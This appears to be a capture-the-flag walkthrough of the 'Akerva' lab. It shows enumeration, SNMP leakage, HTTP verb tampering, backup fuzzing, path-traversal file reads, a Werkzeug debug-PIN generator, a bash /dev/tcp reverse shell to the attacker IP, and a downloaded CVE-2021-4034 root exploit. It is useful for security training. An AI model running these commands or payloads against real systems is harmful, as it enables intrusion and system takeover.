Akerva Forttress

flags
AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts}
AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}
AKERVA{IKNoW###VeRbTamper!nG_==}
AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}
AKERVA{IKNOW#LFi_@_}
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
AKERVA{IkNow_Sud0_sUckS!}

RECONOCIMIENTO INICIAL

ESCANEO TCP

# Nmap 7.95 scan initiated Sat Feb  7 12:39:09 2026 as: /usr/lib/nmap/nmap --privileged -Pn -n --disable-arp-ping -sCV -p- --min-rate 3000 -oN 10.13.37.11_TCP -vvv 10.13.37.11
Nmap scan report for 10.13.37.11
Host is up, received user-set (0.11s latency).
Scanned at 2026-02-07 12:39:09 EST for 34s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 0d:e4:41:fd:9f:a9:07:4d:25:b4:bd:5d:26:cc:4f:da (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCYsb2eP012xQGyABOzy+gWdxyHIa7xFBkwpLlFOBlYVsJp87Vtve02GudeSUjrz59c7y5nJkLxJAKQRXIObz/jzvCUkTMjH56Mc/3hzdkAzlWg/Gq3vNTyOLODkPPInJGGk1WgovnLcAJtNgdXaO7nYrDqyC8eCjBt7ppsONrz9FmEbiqLQl1m/LYb7Em6X1ZviytlJeH7eEk3UcKX45sNpzaUINdf1PJnXK3CLTB+vEAaieWz1GzCMsuRMphsmnW/d2ObpfZfCMa/NKYpAi0Z6yxUlI/HPEOWNnWO45OZ+7+M8NTxklZCHUbeCDhK8YSnpXtaEFPZvKajqZB+F2tR
|   256 f7:65:51:e0:39:37:2c:81:7f:b5:55:bd:63:9c:82:b5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEKLumcSSQuW4qihcz0zZyca/KvBaXlysVAvY/DqLV0vo4bPoz+PH0qP7vuSlgCIqdiyJKq5JFfJz58e4kujk90=
|   256 28:61:d3:5a:b9:39:f2:5b:d7:10:5a:67:ee:81:a8:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINAqCT5KghTKGzjImXygZG4vYKvk0akCYJaonX3hXvkE
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.4-alpha-47225
|_http-title: Root of the Universe – by @lydericlefebvre & @akerva_fr
|_http-favicon: Unknown favicon MD5: 6A6F2809F13E037DDC8D625B58FDA218
|_http-server-header: Apache/2.4.29 (Ubuntu)
5000/tcp open  http    syn-ack ttl 63 Python BaseHTTPServer http.server 2 or 3.0 - 3.1
| http-auth: 
| HTTP/1.0 401 UNAUTHORIZED\x0D
|_  Basic realm=Authentication Required
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  7 12:39:43 2026 -- 1 IP address (1 host up) scanned in 34.34 seconds
                                                                                                

PUERTO	SERVICIO
80	Wordpress
5000	werkzeug 0.16.0

ESCANEO UDP

┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n --disable-arp-ping -sV -sU -p161 --min-rate 3000 10.13.37.11 -oN "10.13.37.11_UDP" -vvv 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-07 12:52 EST
NSE: Loaded 47 scripts for scanning.
Initiating UDP Scan at 12:52
Scanning 10.13.37.11 [1 port]
Discovered open port 161/udp on 10.13.37.11
Completed UDP Scan at 12:52, 0.24s elapsed (1 total ports)
Initiating Service scan at 12:52
NSE: Script scanning 10.13.37.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:52
Completed NSE at 12:52, 0.22s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:52
Completed NSE at 12:52, 0.00s elapsed
Nmap scan report for 10.13.37.11
Host is up, received user-set (0.12s latency).
Scanned at 2026-02-07 12:52:32 EST for 0s

PORT    STATE SERVICE REASON              VERSION
161/udp open  snmp    udp-response ttl 63 SNMPv1 server; net-snmp SNMPv3 server (public)
Service Info: Host: Leakage

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
           Raw packets sent: 2 (167B) | Rcvd: 1 (78B)
                                                           

ENUMERACION DE SERVICIO SNMP

┌──(kali㉿kali)-[~]
└─$ snmpwalk -v2c -c public 10.13.37.11

iso.3.6.1.2.1.25.4.2.1.5.1236 = STRING: "-c /opt/check_backup.sh"
iso.3.6.1.2.1.25.4.2.1.5.1237 = STRING: "-c /opt/check_devSite.sh"
iso.3.6.1.2.1.25.4.2.1.5.1238 = STRING: "/opt/check_backup.sh"
iso.3.6.1.2.1.25.4.2.1.5.1239 = STRING: "/opt/check_devSite.sh"
iso.3.6.1.2.1.25.4.2.1.5.1242 = STRING: "/var/www/html/dev/space_dev.py"
iso.3.6.1.2.1.25.4.2.1.5.1243 = STRING: "/var/www/html/scripts/backup_every_17minutes.sh AKERVA{IkN0w_SnMP@@@MIsconfigur@T!onS}"
iso.3.6.1.2.1.25.4.2.1.5.1248 = STRING: "/var/www/html/dev/space_dev.py"
iso.3.6.1.2.1.25.4.2.1.5.1250 = STRING: "--socket-activation"
iso.3.6.1.2.1.25.4.2.1.5.1256 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1258 = STRING: "-k start"

verb tampering

┌──(kali㉿kali)-[~]
└─$ curl -X POST http://10.13.37.11/scripts/backup_every_17minutes.sh
#!/bin/bash
#
# This script performs backups of production and development websites.
# Backups are done every 17 minutes.
#
# AKERVA{IKNoW###VeRbTamper!nG_==}
#

SAVE_DIR=/var/www/html/backups

while true
do
        ARCHIVE_NAME=backup_$(date +%Y%m%d%H%M%S)
        echo "Erasing old backups..."
        rm -rf $SAVE_DIR/*

        echo "Backuping..."
        zip -r $SAVE_DIR/$ARCHIVE_NAME /var/www/html/*

        echo "Done..."
        sleep 1020
done

fuzzing de backups

──(kali㉿kali)-[~]
└─$ for hour in $(seq -f "%02g" 0 23); do
    for minute in $(seq -f "%02g" 0 59); do
        for second in $(seq -f "%02g" 0 59); do
            echo "20250207${hour}${minute}${second}"
        done
    done
done > timestamps.txt


┌──(kali㉿kali)-[~]
└─$ ffuf -u http://10.13.37.11/backups/backup_FUZZ.zip -w timestamps.txt -t 200

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.13.37.11/backups/backup_FUZZ.zip
 :: Wordlist         : FUZZ: /home/kali/timestamps.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

20260207182947          [Status: 200, Size: 22071775, Words: 0, Lines: 0, Duration: 0ms]
:: Progress: [86400/86400] :: Job [1/1] :: 172 req/sec :: Duration: [0:01:20] :: Errors: 0 ::

┌──(kali㉿kali)-[~/akerva/var/www/html]
└─$ grep -r 'AKERVA{'
dev/space_dev.py:        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
scripts/backup_every_17minutes.sh:# AKERVA{IKNoW###VeRbTamper!nG_==}
wp-content/themes/twentyfifteen/header.php:<!-- By the way, the first flag is: AKERVA{Ikn0w_F0rgoTTEN#CoMmeNts} -->

analisis del codigo

servicio corriendo en el puerto 5000

NOTAMOS QUE EL DEBUG PANEL ESTA HABILITADO

┌──(kali㉿kali)-[~/…/var/www/html/dev]
└─$ cat space_dev.py              
#!/usr/bin/python

from flask import Flask, request
from flask_httpauth import HTTPBasicAuth
from werkzeug.security import generate_password_hash, check_password_hash

app = Flask(__name__)
auth = HTTPBasicAuth()

users = {
        "aas": generate_password_hash("AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}")
        }

@auth.verify_password
def verify_password(username, password):
    if username in users:
        return check_password_hash(users.get(username), password)
    return False

@app.route('/')
@auth.login_required
def hello_world():
    return 'Hello, World!'

# TODO
@app.route('/download')
@auth.login_required
def download():
    return downloaded_file

@app.route("/file")
@auth.login_required
def file():
        filename = request.args.get('filename')
        try:
                with open(filename, 'r') as f:
                        return f.read()
        except:
                return 'error'

if __name__ == '__main__':
    print(app)
    print(getattr(app, '__name__', getattr(app.__class__, '__name__')))
    app.run(host='0.0.0.0', port='5000', debug = True)
                                                                                                                                                                            

LFI

┌──(kali㉿kali)-[~/…/var/www/html/dev]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
aas:x:1000:1000:Lyderic Lefebvre:/home/aas:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
Debian-snmp:x:111:113::/var/lib/snmp:/bin/false
mysql:x:109:115:MySQL Server,,,:/nonexistent:/bin/false1

bypass werkzeug pin

┌──(kali㉿kali)-[~]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../sys/class/net/ens33/address'
┌──(kali㉿kali)-[~]
└─$ curl -u 'aas:AKERVA{1kn0w_H0w_TO_$Cr1p_T_$$$$$$$$}' -X GET 'http://10.13.37.11:5000/file?filename=../../../../etc/machine-id'

import hashlib
from itertools import chain
probably_public_bits = [
    'aas',
    'flask.app'
    'Flask',
    '/usr/local/lib/python2.7/dist-packages/flask/app.pyc'
]

private_bits = [
    '345051784860',  # str(uuid.getnode()),  /sys/class/net/ens33/address
    '258f132cd7e647caaf5510e3aca997c1'  # get_machine_id(), /etc/machine-id
]

h = hashlib.md5()  # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
# h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
# h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num
print(rv)

RCE

>>> __import__('os').popen('cat flag.txt').read();
'AKERVA{IKNOW#LFi_@_}\n'
>>> __import__('os').popen('/bin/bash  -c "/bin/bash -i >& /dev/tcp/10.10.14.235/4445 0>&1"').read();
>>> 
>>> 
>>> 

aas@Leakage:~$ cat .hiddenflag.txt
cat .hiddenflag.txt
AKERVA{IkNOW#=ByPassWerkZeugPinC0de!}
aas@Leakage:~$ 

SUDO CVE-2021-4034

$ wget https://raw.githubusercontent.com/dadvlingd/CVE-2021-4034/refs/heads/main/CVE-2021-4034-py3.py

$ python3 CVE-2021-4034-py3.py

$ cat flag.txt
 AKERVA{IkNow_Sud0_sUckS!}